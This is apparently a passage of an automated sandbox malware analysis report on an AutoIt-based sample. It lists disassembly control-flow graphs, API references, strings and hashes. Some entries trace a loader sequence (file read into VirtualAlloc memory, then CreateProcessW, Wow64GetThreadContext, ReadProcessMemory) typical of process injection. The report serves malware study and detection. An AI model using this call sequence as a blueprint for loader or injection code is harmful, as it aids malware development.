                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: 76bfb3ca89d2e20e818ec84819450566bd4906cbcbda164a16854010f5861eaa
                    • Instruction ID: 15a2d722f1cbf5a425a7f7380d5154ca8614a76051f1ecaaee1e98688dc4a249
                    • Opcode Fuzzy Hash: 76bfb3ca89d2e20e818ec84819450566bd4906cbcbda164a16854010f5861eaa
                    • Instruction Fuzzy Hash: 9821F971A40304EFEB509FA4EC49F9D7BB6FB08721F10412AE504A62A0E7BA56649F94

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 9f0e3886b5d1914dd79e1b1deb65870e440b1dce3e6648339214afcc12409394
                    • Instruction ID: a5ae9d1b227cbf102a272d0c1290a17e676fe5c155b12f04804916f4863cb698
                    • Opcode Fuzzy Hash: 9f0e3886b5d1914dd79e1b1deb65870e440b1dce3e6648339214afcc12409394
                    • Instruction Fuzzy Hash: DEA13E7191022DDADF14EBA0CC9AEEEB778BF15300F444529F516B7192EF786A09CB60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 953 2392600-23926ae call 2390000 956 23926b5-23926db call 2393510 CreateFileW 953->956 959 23926dd 956->959 960 23926e2-23926f2 956->960 961 239282d-2392831 959->961 968 23926f9-2392713 VirtualAlloc 960->968 969 23926f4 960->969 962 2392873-2392876 961->962 963 2392833-2392837 961->963 965 2392879-2392880 962->965 966 2392839-239283c 963->966 967 2392843-2392847 963->967 970 2392882-239288d 965->970 971 23928d5-23928ea 965->971 966->967 972 2392849-2392853 967->972 973 2392857-239285b 967->973 974 239271a-2392731 ReadFile 968->974 975 2392715 968->975 969->961 978 239288f 970->978 979 2392891-239289d 970->979 980 23928fa-2392902 971->980 981 23928ec-23928f7 VirtualFree 971->981 972->973 982 239286b 973->982 983 239285d-2392867 973->983 976 2392738-2392778 VirtualAlloc 974->976 977 2392733 974->977 975->961 984 239277a 976->984 985 239277f-239279a call 2393760 976->985 977->961 978->971 986 239289f-23928af 979->986 987 23928b1-23928bd 979->987 981->980 982->962 983->982 984->961 993 23927a5-23927af 985->993 989 23928d3 986->989 990 23928ca-23928d0 987->990 991 23928bf-23928c8 987->991 989->965 990->989 991->989 994 23927b1-23927e0 call 2393760 993->994 995 23927e2-23927f6 call 2393570 993->995 994->993 1001 23927f8 995->1001 1002 23927fa-23927fe 995->1002 1001->961 1003 239280a-239280e 1002->1003 1004 2392800-2392804 FindCloseChangeNotification 1002->1004 1005 239281e-2392827 1003->1005 1006 2392810-239281b VirtualFree 1003->1006 1004->1003 1005->956 1005->961 1006->1005
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 023926D1
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 023928F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                    • Instruction ID: cb549ff101c2991e61cbc71ad3850e576561a137e699b29dbfbb60f828606fb2
                    • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                    • Instruction Fuzzy Hash: 53A1F374E04209EBDF14CFA4C894BEEBBB5BF49304F208559E901BB281D7759A80CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1074 7439e7-743a57 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00743A15
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00743A36
                    • ShowWindow.USER32(00000000,?,?), ref: 00743A4A
                    • ShowWindow.USER32(00000000,?,?), ref: 00743A53
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 671db9091fe40f80a6f76264d86fd00802033463daadcce9df561b646fa463a4
                    • Instruction ID: a8f6d3aa8156f1501e2d43de9f060f35741253f00ebf5d5ad3c444144431c9b5
                    • Opcode Fuzzy Hash: 671db9091fe40f80a6f76264d86fd00802033463daadcce9df561b646fa463a4
                    • Instruction Fuzzy Hash: DEF0DA71641290BFEA7117276C4DF672E7EE7C6F60B00412EF904A2170D6B91871DAB4

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1075 23923b0-2392501 call 2390000 call 23922a0 CreateFileW 1082 2392508-2392518 1075->1082 1083 2392503 1075->1083 1086 239251a 1082->1086 1087 239251f-2392539 VirtualAlloc 1082->1087 1084 23925b8-23925bd 1083->1084 1086->1084 1088 239253b 1087->1088 1089 239253d-2392554 ReadFile 1087->1089 1088->1084 1090 2392558-2392592 call 23922e0 call 23912a0 1089->1090 1091 2392556 1089->1091 1096 23925ae-23925b6 ExitProcess 1090->1096 1097 2392594-23925a9 call 2392330 1090->1097 1091->1084 1096->1084 1097->1096
                    APIs
                      • Part of subcall function 023922A0: Sleep.KERNELBASE(000001F4), ref: 023922B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023924F7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: MV00LG4OEICT513EWCVNY9SFZ0F16J
                    • API String ID: 2694422964-1512823477
                    • Opcode ID: 118880941effc9ed61fb06dc03d83a575e0c9056eeceebb0f458fc09cbca8d5e
                    • Instruction ID: 2afb60844e021ab0f9e5d56b10696bffba0af0ef453cfa74860ab0f7b3f0669c
                    • Opcode Fuzzy Hash: 118880941effc9ed61fb06dc03d83a575e0c9056eeceebb0f458fc09cbca8d5e
                    • Instruction Fuzzy Hash: FF616270D14288EAEF11D7A4C858BDFBBB99F15304F044199E6487B2C1D7BA0B49CBA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1099 74410d-744123 1100 744200-744204 1099->1100 1101 744129-74413e call 747b76 1099->1101 1104 744144-744164 call 747d2c 1101->1104 1105 77d5dd-77d5ec LoadStringW 1101->1105 1108 77d5f7-77d60f call 747c8e call 747143 1104->1108 1109 74416a-74416e 1104->1109 1105->1108 1118 74417e-7441fb call 763020 call 74463e call 762ffc Shell_NotifyIconW call 745a64 1108->1118 1121 77d615-77d633 call 747e0b call 747143 call 747e0b 1108->1121 1111 744174-744179 call 747c8e 1109->1111 1112 744205-74420e call 7481a7 1109->1112 1111->1118 1112->1118 1118->1100 1121->1118
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0077D5EC
                      • Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66
                    • _memset.LIBCMT ref: 0074418D
                    • _wcscpy.LIBCMT ref: 007441E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007441F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: ba19cfe8a3b5dd81aa130fa1e94bb663913ca7bde5bf2315cc19b6e60fbf2d5c
                    • Instruction ID: 19a0af8b35c41d6a20e58811dfc103876ac5bacef6529e2e0b7760352244d8ab
                    • Opcode Fuzzy Hash: ba19cfe8a3b5dd81aa130fa1e94bb663913ca7bde5bf2315cc19b6e60fbf2d5c
                    • Instruction Fuzzy Hash: 0631D371008318EBE765EB60DC8AFDB77E8BF44300F10451EF595920A1EB789A68C796

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1134 76564d-765666 1135 765683 1134->1135 1136 765668-76566d 1134->1136 1138 765685-76568b 1135->1138 1136->1135 1137 76566f-765671 1136->1137 1139 765673-765678 call 768d68 1137->1139 1140 76568c-765691 1137->1140 1152 76567e call 768ff6 1139->1152 1142 765693-76569d 1140->1142 1143 76569f-7656a3 1140->1143 1142->1143 1144 7656c3-7656d2 1142->1144 1145 7656a5-7656b0 call 763020 1143->1145 1146 7656b3-7656b5 1143->1146 1150 7656d4-7656d7 1144->1150 1151 7656d9 1144->1151 1145->1146 1146->1139 1149 7656b7-7656c1 1146->1149 1149->1139 1149->1144 1154 7656de-7656e3 1150->1154 1151->1154 1152->1135 1156 7657cc-7657cf 1154->1156 1157 7656e9-7656f0 1154->1157 1156->1138 1158 7656f2-7656fa 1157->1158 1159 765731-765733 1157->1159 1158->1159 1162 7656fc 1158->1162 1160 765735-765737 1159->1160 1161 76579d-76579e call 770df7 1159->1161 1163 76575b-765766 1160->1163 1164 765739-765741 1160->1164 1171 7657a3-7657a7 1161->1171 1166 765702-765704 1162->1166 1167 7657fa 1162->1167 1172 76576a-76576d 1163->1172 1173 765768 1163->1173 1169 765743-76574f 1164->1169 1170 765751-765755 1164->1170 1174 765706-765708 1166->1174 1175 76570b-765710 1166->1175 1168 7657fe-765807 1167->1168 1168->1138 1178 765757-765759 1169->1178 1170->1178 1171->1168 1179 7657a9-7657ae 1171->1179 1177 7657d4-7657d8 1172->1177 1180 76576f-76577b call 764916 call 7710ab 1172->1180 1173->1172 1174->1175 1176 765716-76572f call 770f18 1175->1176 1175->1177 1192 765792-76579b 1176->1192 1183 7657ea-7657f5 call 768d68 1177->1183 1184 7657da-7657e7 call 763020 1177->1184 1178->1172 1179->1177 1182 7657b0-7657c1 1179->1182 1195 765780-765785 1180->1195 1188 7657c4-7657c6 1182->1188 1183->1152 1184->1183 1188->1156 1188->1157 1192->1188 1196 76580c-765810 1195->1196 1197 76578b-76578e 1195->1197 1196->1168 1197->1167 1198 765790 1197->1198 1198->1192
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 990e5cb23cc458da7f234c12e1fcf39f3530ccd544f42378450b102ddee986b8
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: 29518030A00B05DFDB249FB9C88466EB7A5AF40720F648729FC2B962D1D7789D50EB50
                    APIs
                      • Part of subcall function 00744F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744F6F
                    • _free.LIBCMT ref: 0077E68C
                    • _free.LIBCMT ref: 0077E6D3
                      • Part of subcall function 00746BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00746D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 4229e3a677c0f5b725ab916d1ca98647823da117f06a5d018abb16882413cf3e
                    • Instruction ID: e1885c9e80b2339abfd3ad20d568d003f6b45e60f87440f397c6f6fbca870d76
                    • Opcode Fuzzy Hash: 4229e3a677c0f5b725ab916d1ca98647823da117f06a5d018abb16882413cf3e
                    • Instruction Fuzzy Hash: BF918E71A10219EFCF04EFA4CC859EDB7B4FF19354B148469F815EB291EB38A915CB60
                    APIs
                      • Part of subcall function 007603A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007603D3
                      • Part of subcall function 007603A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007603DB
                      • Part of subcall function 007603A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007603E6
                      • Part of subcall function 007603A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007603F1
                      • Part of subcall function 007603A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007603F9
                      • Part of subcall function 007603A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00760401
                      • Part of subcall function 00756259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0074FA90), ref: 007562B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0074FB2D
                    • OleInitialize.OLE32(00000000), ref: 0074FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 007849F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: %}
                    • API String ID: 1986988660-578177530
                    • Opcode ID: eb06dd21bde60d0918c08f0b7dbbbe51b39137472ff6fdd37a19b290685b957f
                    • Instruction ID: a1a9b04852513389af2eaaf4a45a7f7692f47019c650ddfd854381b1436ab47c
                    • Opcode Fuzzy Hash: eb06dd21bde60d0918c08f0b7dbbbe51b39137472ff6fdd37a19b290685b957f
                    • Instruction Fuzzy Hash: 0081B9B0A01A40CEC3C8DF69AD896157BE5FB89318710823AD119C73A2FB794439CF98
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007435A1,SwapMouseButtons,00000004,?), ref: 007435D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007435A1,SwapMouseButtons,00000004,?,?,?,?,00742754), ref: 007435F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,007435A1,SwapMouseButtons,00000004,?,?,?,?,00742754), ref: 00743617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 3612f3f2c1b80458e4e649128440b1e8590b957cf4c2449405ffae8baface32e
                    • Instruction ID: cdb4db237cb656fc65c2f0c4a8b94129efd81d3498cbfc016a4878443bb226af
                    • Opcode Fuzzy Hash: 3612f3f2c1b80458e4e649128440b1e8590b957cf4c2449405ffae8baface32e
                    • Instruction Fuzzy Hash: 1A115771610209BFDB209F64DC80EEEBBB9EF04740F128469F809D7210E3759F409BA6
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 02391ACD
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02391AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02391B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                    • Instruction ID: a14ecb0a41ae932b4213d9ffaacc28c080c1d27e080e5e10a866339e5a6ea5c7
                    • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                    • Instruction Fuzzy Hash: ED622C30A14259DBEB24CFA4C840BEEB376EF59700F1091A9D10DEB394E7759E81CB59
                    APIs
                      • Part of subcall function 00745045: _fseek.LIBCMT ref: 0074505D
                      • Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AAE
                      • Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AC1
                    • _free.LIBCMT ref: 007A992C
                    • _free.LIBCMT ref: 007A9933
                    • _free.LIBCMT ref: 007A999E
                      • Part of subcall function 00762F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00769C64), ref: 00762FA9
                      • Part of subcall function 00762F95: GetLastError.KERNEL32(00000000,?,00769C64), ref: 00762FBB
                    • _free.LIBCMT ref: 007A99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: d2832847bd0f9b5c655aefe39bd695ae1a4052788d806671e2f88c7454a9ea3e
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 2C5160B1D04218EFDF249F64CC45A9EBBB9EF89300F1005AEB609A7251DB355E90CF59
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 04816d767bd2fd1efdccf1b264e6430e03ad742fe6472eb842a98e5505d828e5
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: D241D575640705AFDF28DEA9C8849AF7BAAEF80360B24C13DEC57D7640E778AD408B44
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/}$EA06
                    • API String ID: 4104443479-3992199863
                    • Opcode ID: 2b54c66a309529ce4654193b3cef441a1d7d76cbade2da0a589c0cc1aa67caeb
                    • Instruction ID: d5a962b655117203fe46ec494a9a564d4e361c11b9243391b41611dc30d44b28
                    • Opcode Fuzzy Hash: 2b54c66a309529ce4654193b3cef441a1d7d76cbade2da0a589c0cc1aa67caeb
                    • Instruction Fuzzy Hash: 0B416A71A041A8ABDF219F648C557BE7FA6AF06300F684065FC829B283C73D9D44A7E1
                    APIs
                    • _memset.LIBCMT ref: 0077EE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 0077EEAC
                      • Part of subcall function 007448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007448A1,?,?,007437C0,?), ref: 007448CE
                      • Part of subcall function 007609D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007609F4
                    Strings
                    Memory Dump Source
